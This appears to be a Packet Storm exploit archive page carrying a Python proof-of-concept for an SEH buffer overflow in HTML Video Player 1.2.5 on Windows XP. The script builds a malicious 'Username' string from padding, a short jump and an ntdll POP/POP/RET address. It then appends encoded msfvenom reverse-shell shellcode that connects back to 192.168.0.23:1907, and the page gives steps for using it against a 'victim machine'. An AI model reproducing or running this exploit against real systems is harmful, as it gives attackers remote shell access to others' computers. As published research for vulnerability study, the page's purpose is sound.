what you don't know can hurt you

HTML Video Player 1.2.5 Buffer Overflow

HTML Video Player 1.2.5 Buffer Overflow
Posted Nov 17, 2018
Authored by Kagan Capar

HTML Video Player version 1.2.5 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
MD5 | ab18abd61ba3a76adf1d443b98ca02f5

HTML Video Player 1.2.5 Buffer Overflow

Change Mirror Download
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kagan Capar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the python exploit script, it will create a new
# file with the name "exploit.txt" and copy content to clipboard
# Open software, click Help > Register and paste "Username" click "OK"
# Finally, Connect victim machine on port your localport "1907"

#!/usr/bin/python
import struct

#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 =>

#7C901931 5E POP ESI
#7C901932 5B POP EBX
#7C901933 C3 RETN

#Executable modules, item 14
#Base=7C900000
#Size=000B2000 (729088.)
#Entry=7C912AFC ntdll.<ModuleEntryPoint>
#Name=ntdll (system)
#File version=5.1.2600.6055 (xpsp_sp3_qfe.101
#Path=C:\WINDOWS\system32\ntdll.dll

file = open("exploit.txt", "w")
buf = "\x43\x57\x44\x4F\x4E\x4B\x4E\x50\x48\x52\x4B\x45\x59\x41\x4b\x53" * 124
buf+= "\xEB\x06\x90\x90" #6b jmp code
buf+= struct.pack('<I', 0x7C901931)

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.23 LPORT=1907 EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x1a"
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
#Final size of py file: 1684 bytes

buf += "\xbe\xab\xfd\x5f\x95\xda\xcb\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x77\x0e\x03\xdc\xf3\xbd"
buf += "\x60\xde\xe4\xc0\x8b\x1e\xf5\xa4\x02\xfb\xc4\xe4\x71"
buf += "\x88\x77\xd5\xf2\xdc\x7b\x9e\x57\xf4\x08\xd2\x7f\xfb"
buf += "\xb9\x59\xa6\x32\x39\xf1\x9a\x55\xb9\x08\xcf\xb5\x80"
buf += "\xc2\x02\xb4\xc5\x3f\xee\xe4\x9e\x34\x5d\x18\xaa\x01"
buf += "\x5e\x93\xe0\x84\xe6\x40\xb0\xa7\xc7\xd7\xca\xf1\xc7"
buf += "\xd6\x1f\x8a\x41\xc0\x7c\xb7\x18\x7b\xb6\x43\x9b\xad"
buf += "\x86\xac\x30\x90\x26\x5f\x48\xd5\x81\x80\x3f\x2f\xf2"
buf += "\x3d\x38\xf4\x88\x99\xcd\xee\x2b\x69\x75\xca\xca\xbe"
buf += "\xe0\x99\xc1\x0b\x66\xc5\xc5\x8a\xab\x7e\xf1\x07\x4a"
buf += "\x50\x73\x53\x69\x74\xdf\x07\x10\x2d\x85\xe6\x2d\x2d"
buf += "\x66\x56\x88\x26\x8b\x83\xa1\x65\xc4\x60\x88\x95\x14"
buf += "\xef\x9b\xe6\x26\xb0\x37\x60\x0b\x39\x9e\x77\x6c\x10"
buf += "\x66\xe7\x93\x9b\x97\x2e\x50\xcf\xc7\x58\x71\x70\x8c"
buf += "\x98\x7e\xa5\x03\xc8\xd0\x16\xe4\xb8\x90\xc6\x8c\xd2"
buf += "\x1e\x38\xac\xdd\xf4\x51\x47\x24\x9f\x9d\x30\x26\x48"
buf += "\x76\x43\x26\x71\xf5\xca\xc0\x17\xe9\x9a\x5b\x80\x90"
buf += "\x86\x17\x31\x5c\x1d\x52\x71\xd6\x92\xa3\x3c\x1f\xde"
buf += "\xb7\xa9\xef\x95\xe5\x7c\xef\x03\x81\xe3\x62\xc8\x51"
buf += "\x6d\x9f\x47\x06\x3a\x51\x9e\xc2\xd6\xc8\x08\xf0\x2a"
buf += "\x8c\x73\xb0\xf0\x6d\x7d\x39\x74\xc9\x59\x29\x40\xd2"
buf += "\xe5\x1d\x1c\x85\xb3\xcb\xda\x7f\x72\xa5\xb4\x2c\xdc"
buf += "\x21\x40\x1f\xdf\x37\x4d\x4a\xa9\xd7\xfc\x23\xec\xe8"
buf += "\x31\xa4\xf8\x91\x2f\x54\x06\x48\xf4\x74\xe5\x58\x01"
buf += "\x1d\xb0\x09\xa8\x40\x43\xe4\xef\x7c\xc0\x0c\x90\x7a"
buf += "\xd8\x65\x95\xc7\x5e\x96\xe7\x58\x0b\x98\x54\x58\x1e"
buf += "\x90" * (4000 - len(buf))

print len(buf)
file.write(buf)
file.close()



Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close